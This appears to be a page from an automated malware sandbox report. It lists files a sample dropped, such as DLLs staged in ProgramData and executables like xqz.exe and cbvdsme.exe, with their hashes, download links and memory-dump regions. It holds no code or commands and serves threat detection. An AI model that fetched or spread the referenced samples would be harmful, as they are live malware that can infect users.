e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
\ProgramData\msvcp140.dll
MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
\ProgramData\sqlite3.dll
MD5
e477a96c8f2b18d6b5c27bde49c990bf

SHA1
e980c9bf41330d1e5bd04556db4646a0210f7409

SHA256
16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660

SHA512
335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

Download Submit
\ProgramData\vcruntime140.dll
MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
\Users\Admin\AppData\Local\Temp\EB1A.tmp\Patch-nb9.exe
MD5
50a3f5f228bcc21b4c3487b882672ebd

SHA1
facd0a9ec9d4deb17519ad4b5c1e1a298c51e8bd

SHA256
d5d2404d1162f37d09d9da2c920250503fcfca10e136fdf376cb2bab552973c9

SHA512
b3bf2726b3404755e608cba5f1c7464640166a93ad29a84a6658a889534d7088a2eaf70df1f9cd0debe104000b51f543313206b231b20a7d283fba0f3697d1ce

Download Submit
\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
\Users\Admin\AppData\Local\Temp\cbvdsme.exe
MD5
af4f7630f1e292f5d6a4e7157c662550

SHA1
d74428bab94698e8f71134f2ce0020403e16ccc8

SHA256
b5f94e330b47c0dcf0e748af9e3e9a030d0c678301eb4ba5c391ad650ecf146a

SHA512
b893918c1add4f44a47d5ab20f983bcfdac04c747226f7c6b57f749d0c28942d95818d5b3127bc9e38ba83ac3107fe5ec479920347814ebc1702962428bcceba

Download Submit
\Users\Admin\AppData\Local\Temp\dup2patcher.dll
MD5
45c41eb1682fa0166f95aac876216375

SHA1
996400179494633458e160b5f0be6d62653cff75

SHA256
2666ab3caaa1f2aa111652e034af8f278f3741d7730576939c86bfb5496c2ab2

SHA512
a2a393400369dbd86c1e445776eef537582d26a50e7455841752a8d75d87ef867ab9daf3e7a9927281d87cdf35e988dc599b104cd1078e91c78108c9fea17408

Download Submit
\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
\Users\Admin\AppData\Local\Temp\fsacvbe.exe
MD5
a78c23397c81f5e49296b6ff5b956928

SHA1
1b6ab1769e58c21c9cd6aa343379fbe5cefda526

SHA256
bc1722809baae20c024e8e9c71c0ff81f6af06989f15518c573fcf2d5a8218df

SHA512
c25b42a52bf81a99cc87ff8afd6c3e23e018e9e0e9b4c2cd4a8a124173f8a7cfbe4cd3a6cab4456bd51411b1fd5a45399a3f499df8d4b4acea8b9143b6d5b1b4

Download Submit
\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
\Users\Public\xqz.exe
MD5
a3cc781be4a0cc75f14ce69b59f8c99f

SHA1
9c13ea485984c9e75196c4d0bd871b1b7dc72017

SHA256
e4649c5b452d75aa2cdfdb8bffed9dd6c558d3cb1225c877bf570abb7b106221

SHA512
bb9f6115dac6d1001f5223c9a8d00c7c2b3865d7e9f99bad773df52d188e93282547ea37e496d987f3243c2445afaefe76b7e4849c2eb09bd73ba9ea21e23430

Download Submit
memory/288-62-0x0000000000000000-mapping.dmp

Download
memory/368-102-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/368-103-0x0000000000240000-0x0000000000247000-memory.dmp

Filesize
28KB

Download
memory/368-92-0x0000000000000000-mapping.dmp

Download
memory/472-56-0x0000000000000000-mapping.dmp

Download
memory/568-87-0x0000000000220000-0x0000000000226000-memory.dmp

Filesize
24KB

Download
memory/568-85-0x0000000000000000-mapping.dmp

Download
memory/568-88-0x0000000000220000-0x000000000022A000-memory.dmp

Filesize
40KB

Download
memory/568-101-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/628-143-0x0000000000000000-mapping.dmp

Download
memory/792-55-0x0000000075C21000-0x0000000075C23000-memory.dmp

Filesize
8KB

Download
memory/980-134-0x0000000000417A8B-mapping.dmp

Download
memory/980-137-0x0000000000400000-0x0000000000434000-memory.dmp

Filesize
208KB

Download
memory/996-72-0x0000000000000000-mapping.dmp

Download
memory/996-82-0x0000000001F62000-0x0000000001F64000-memory.dmp

Filesize
8KB

Download
memory/996-79-0x0000000001F60000-0x0000000001F61000-memory.dmp

Filesize
4KB

Download
memory/996-81-0x0000000001F61000-0x0000000001F62000-memory.dmp

Filesize
4KB

Download
memory/1088-74-0x0000000000000000-mapping.dmp

Download
memory/1116-60-0x0000000000000000-mapping.dmp

Download
memory/1348-119-0x000000000041A684-mapping.dmp

Download
memory/1348-122-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/1348-126-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/1516-64-0x0000000000000000-mapping.dmp

Download
memory/1628-109-0x0000000000000000-mapping.dmp

Download
memory/1648-144-0x0000000000000000-mapping.dmp

Download
memory/1704-99-0x0000000000000000-mapping.dmp

Download
memory/1768-125-0x0000000000000000-mapping.dmp

Download
memory/1792-67-0x0000000000000000-mapping.dmp

Download
memory/1824-80-0x0000000002430000-0x000000000307A000-memory.dmp

Filesize
12.3MB

Download
memory/1824-73-0x0000000000000000-mapping.dmp

Download
memory/1936-114-0x000000000043F176-mapping.dmp

Download
memory/1936-127-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/1936-123-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download